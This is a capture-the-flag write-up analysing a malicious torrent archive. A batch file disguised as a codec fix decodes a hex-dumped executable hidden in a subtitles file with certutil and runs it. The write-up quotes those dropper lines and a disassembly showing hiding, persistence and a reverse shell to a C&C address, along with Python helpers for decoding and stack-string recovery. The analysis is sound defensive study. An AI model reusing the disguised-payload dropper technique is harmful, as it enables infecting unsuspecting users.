Cool Video (Smart Home, 150p)

A friend asks for help with a recent movie downloaded from torrents: something is wrong with the player.
The video is available at Horror_stories_2k21-720p.zip
What is the address of C&C of the malware?
The answer is expected in the usual format for an Internet address - <IP>:<PORT>

solution

The archive contains a lot more than just the video file.

 # 7z -ba l Horror_stories_2k21-720p.zip
2021-08-25 07:48:57 D....            0            0  Horror_stories_2k21-720p
2021-08-24 07:50:02 .....      7689166       119207  Horror_stories_2k21-720p/Horror_stories_2k21-720p.mp4
2021-08-24 07:50:24 .....          197          157  Horror_stories_2k21-720p/Readme.txt
2021-08-25 07:48:46 .....       231240        58479  Horror_stories_2k21-720p/Subtitles.srt
2021-08-24 07:42:28 .....         1649          676  Horror_stories_2k21-720p/Video_stream_fix_VLC_K-lite_codecs_pack.bat

Readme.txt tells the user to run Video_stream_fix_VLC_K-lite_codecs_pack.bat, which is malicious: it converts Subtitles.srt from a hex dump back to binary and executes the result.

certutil -decodehex -f Subtitles.srt Subtitles_tmp.srt

start Subtitles_tmp.srt

Converting Subtitles.srt the same way Windows's certutil does produces a Windows EXE file.

# cat Subtitles.srt | cut -c6-53 | xxd -r -p > Subtitles.exe
# file Subtitles.exe
Subtitles.exe: PE32 executable (console) Intel 80386, for MS Windows
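The cut/xxd pipeline above works only because certutil's hex dump has a fixed column layout. As an added example (not part of the write-up), a Python decoder that parses that layout directly, verifies the offsets and checks the result for a PE header; it assumes certutil's format of a 4-digit offset, a tab, sixteen space-separated bytes with an extra space after the eighth (the columns that cut -c6-53 selects), then an ASCII column, and its sample dump is constructed rather than taken from the challenge file.

```python
import re
import struct

def decode_certutil_hex(dump: str) -> bytes:
    """Reverse certutil -encodehex: 'OFFSET<TAB>hh hh ... hh   ascii' lines back to bytes.

    Offsets are checked against the running length, so a truncated or
    re-ordered dump is reported instead of silently producing garbage."""
    out = bytearray()
    for raw in dump.splitlines():
        line = raw.rstrip()
        if not line:
            continue
        m = re.match(r"^([0-9a-fA-F]{4,8})\t(.*)$", line)
        if not m:
            raise ValueError(f"unexpected line: {raw!r}")
        if int(m.group(1), 16) != len(out):
            raise ValueError(f"offset mismatch at line {raw!r}")
        # The hex column ends at the first run of three spaces: either the
        # separator before the ASCII column or the padding on a short last line.
        hex_part = m.group(2).split("   ", 1)[0]
        out += bytes.fromhex(hex_part)    # fromhex skips the single/double spaces
    return bytes(out)

def looks_like_pe(data: bytes) -> bool:
    """True when an MZ header's e_lfanew (offset 0x3c) points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"

# Constructed sample in certutil -encodehex layout (not the challenge's Subtitles.srt):
# a minimal MZ stub whose e_lfanew points at a PE signature at offset 0x40.
SAMPLE_DUMP = "\n".join([
    "0000\t4d 5a 90 00 03 00 00 00  04 00 00 00 ff ff 00 00   MZ..............",
    "0010\tb8 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00   ........@.......",
    "0020\t00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................",
    "0030\t00 00 00 00 00 00 00 00  00 00 00 00 40 00 00 00   ............@...",
    "0040\t50 45 00 00" + " " * 40 + "PE..",
])

if __name__ == "__main__":
    blob = decode_certutil_hex(SAMPLE_DUMP)
    print(f"{len(blob)} bytes decoded, PE header present: {looks_like_pe(blob)}")
```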

Reversing the _main function with radare2 reveals the C&C address.

# r2 -A Subtitles.exe
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Finding and parsing C++ vtables (avrr)
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information (aanr)
[x] Integrate dwarf function information.
[x] Use -AA or aaaa to perform additional experimental analysis.
[0x004012e0]> pdf @ sym._main
            ; CALL XREF from fcn.004011b0 @ 0x401283
┌ 147: int sym._main (char **argv);
│           ; arg char **argv @ ebp+0x8
│           ; arg char **envp @ ebp+0xc
│           ; var int32_t var_4h @ esp+0x4
│           ; var int32_t var_19h @ esp+0x19
│           ; var int32_t var_1dh @ esp+0x1d
│           ; var int32_t var_21h @ esp+0x21
│           ; var int32_t var_25h @ esp+0x25
│           ; var int32_t var_27h @ esp+0x27
│           ; var int32_t var_28h @ esp+0x28
│           ; var int32_t var_2ch @ esp+0x2c
│           0x00401846      55             push ebp
│           0x00401847      89e5           mov ebp, esp
│           0x00401849      83e4f0         and esp, 0xfffffff0
│           0x0040184c      83ec30         sub esp, 0x30
│           0x0040184f      e89c060000     call sym.___main
│           0x00401854      e807fcffff     call sym HideConsole()      ; sym.HideConsole__
│           0x00401859      e823fcffff     call sym Persistence()      ; sym.Persistence__
│           0x0040185e      837d0803       cmp dword [argv], 3
│       ┌─< 0x00401862      752e           jne 0x401892
│       │   0x00401864      8b450c         mov eax, dword [envp]
│       │   0x00401867      83c008         add eax, 8
│       │   0x0040186a      8b00           mov eax, dword [eax]
│       │   0x0040186c      890424         mov dword [esp], eax        ; const char *str
│       │   0x0040186f      e884270000     call sym._atoi              ; int atoi(const char *str)
│       │   0x00401874      8944242c       mov dword [var_2ch], eax
│       │   0x00401878      8b450c         mov eax, dword [envp]
│       │   0x0040187b      83c004         add eax, 4
│       │   0x0040187e      8b00           mov eax, dword [eax]
│       │   0x00401880      8b54242c       mov edx, dword [var_2ch]
│       │   0x00401884      89542404       mov dword [var_4h], edx
│       │   0x00401888      890424         mov dword [esp], eax
│       │   0x0040188b      e8d9fcffff     call sym RunShell(char*, int) ; sym.RunShell_char__int_
│      ┌──< 0x00401890      eb40           jmp 0x4018d2
│      ││   ; CODE XREF from sym._main @ 0x401862
│      │└─> 0x00401892      c74424193139.  mov dword [var_19h], 0x2e323931 ; '192.'
│      │                                                               ; [0x2e323931:4]=-1
│      │    0x0040189a      c744241d3136.  mov dword [var_1dh], 0x2e383631 ; '168.'
│      │                                                               ; [0x2e383631:4]=-1
│      │    0x004018a2      c74424213838.  mov dword [var_21h], 0x322e3838 ; '88.2'
│      │                                                               ; [0x322e3838:4]=-1
│      │    0x004018aa      66c744242533.  mov word [var_25h], 0x3033  ; '30'
│      │                                                               ; [0x3033:2]=0xffff
│      │    0x004018b1      c644242700     mov byte [var_27h], 0
│      │    0x004018b6      c7442428bb01.  mov dword [var_28h], 0x1bb  ; [0x1bb:4]=-1 ; 443
│      │    0x004018be      8b442428       mov eax, dword [var_28h]
│      │    0x004018c2      89442404       mov dword [var_4h], eax
│      │    0x004018c6      8d442419       lea eax, [var_19h]
│      │    0x004018ca      890424         mov dword [esp], eax
│      │    0x004018cd      e897fcffff     call sym RunShell(char*, int) ; sym.RunShell_char__int_
│      │    ; CODE XREF from sym._main @ 0x401890
│      └──> 0x004018d2      b800000000     mov eax, 0
│           0x004018d7      c9             leave
└           0x004018d8      c3             ret

The flag is 192.168.88.230:443.
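The address is assembled on the stack one immediate at a time, which is why it does not show up in a plain strings run over the binary. As an added helper (not part of the write-up), this Python parses the mov immediates from the pdf listing, lays them out at their esp-relative offsets and recovers the NUL-terminated address together with the port dword stored right after it; it assumes radare2's var_XXh naming and a listing that is plain text.

```python
import re

SIZES = {"byte": 1, "word": 2, "dword": 4}
MOV_IMM = re.compile(r"mov (byte|word|dword) \[var_([0-9a-f]+)h\], (0x[0-9a-f]+|\d+)")

def collect_stack_writes(listing):
    """Map each esp-relative offset to the little-endian bytes its immediate stores there."""
    writes = {}
    for m in MOV_IMM.finditer(listing):
        size, offset, value = SIZES[m.group(1)], int(m.group(2), 16), int(m.group(3), 0)
        writes[offset] = value.to_bytes(size, "little")
    return writes

def rebuild_stack(writes):
    """Lay the stores into one contiguous image starting at the lowest offset."""
    lo = min(writes)
    hi = max(off + len(b) for off, b in writes.items())
    buf = bytearray(hi - lo)          # slots never written stay zero
    for off, b in writes.items():
        buf[off - lo:off - lo + len(b)] = b
    return lo, bytes(buf)

def extract_strings(buf, min_len=4):
    """Printable runs in the rebuilt image, like `strings` on a stack snapshot."""
    return [s.decode("ascii") for s in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, buf)]

def find_c2(listing):
    """Return (dotted-quad, port): the port is the first dword stored past the string's NUL."""
    writes = collect_stack_writes(listing)
    lo, buf = rebuild_stack(writes)
    for s in extract_strings(buf):
        if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", s):
            after_nul = lo + buf.index(s.encode()) + len(s) + 1
            for off in sorted(writes):
                if off >= after_nul and len(writes[off]) == 4:
                    return s, int.from_bytes(writes[off], "little")
    return None
# The immediate stores copied from the sym._main listing above (other lines are ignored).
LISTING = """
0x00401892  mov dword [var_19h], 0x2e323931 ; '192.'
0x0040189a  mov dword [var_1dh], 0x2e383631 ; '168.'
0x004018a2  mov dword [var_21h], 0x322e3838 ; '88.2'
0x004018aa  mov word [var_25h], 0x3033  ; '30'
0x004018b1  mov byte [var_27h], 0
0x004018b6  mov dword [var_28h], 0x1bb  ; 443
"""

if __name__ == "__main__":
    ip, port = find_c2(LISTING)
    print(f"{ip}:{port}")    # 192.168.88.230:443
```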
